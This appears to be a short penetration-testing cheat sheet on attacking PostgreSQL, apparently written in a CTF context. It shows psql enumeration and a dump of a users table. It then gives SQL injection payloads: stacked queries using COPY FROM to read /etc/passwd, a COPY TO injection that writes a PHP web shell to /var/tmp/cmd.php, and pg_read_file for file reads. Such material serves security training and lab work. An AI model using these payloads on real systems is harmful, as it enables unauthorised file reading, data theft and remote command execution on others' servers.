PostgreSQL (5432)
Usage
PostgreSQL stores metadata in tables beggining with pg_
.
SELECT version();
We can connect via CLI with psql
.
psql -h 127.0.0.1 -U postgres
# Listing dbs
postgres=# \l
# Connecting to a db
postgres=# \c cozyhosting
# Listing tables
cozyhosting=# \dt
# Dumping data
cozyhosting=# select * from users;
SQLi
Read/Write
COPY FROM
-> insert data into a table from a file (the PostgreSQL process must haveread
access to the file and the user making the query permissions to create a new table).
// example using stacked queries
create table tmp(data text); // create the table tmp with one column named data
copy tmp from '/etc/passwd'; // copy the file contents into the tmp table
select * from tmp; // select all data from the tmp table
COPY TO
-> copy data to a file from a table (the PostgreSQL process must havewrite
permissions to the directory where the file will be created).
1';copy(select '<?php passthru($_GET["cmd"]);?>') to '/var/tmp/cmd.php';-- -
pg_read_file()
-> instead of inserting the results into a table, it just returns a single field containing all the data (useful if the PostgreSQL process hasread
access on the file, but the user querying don't have permissions to create a new table).
SELECT pg_read_file('/var/tmp/proof.txt');
Last updated
Was this helpful?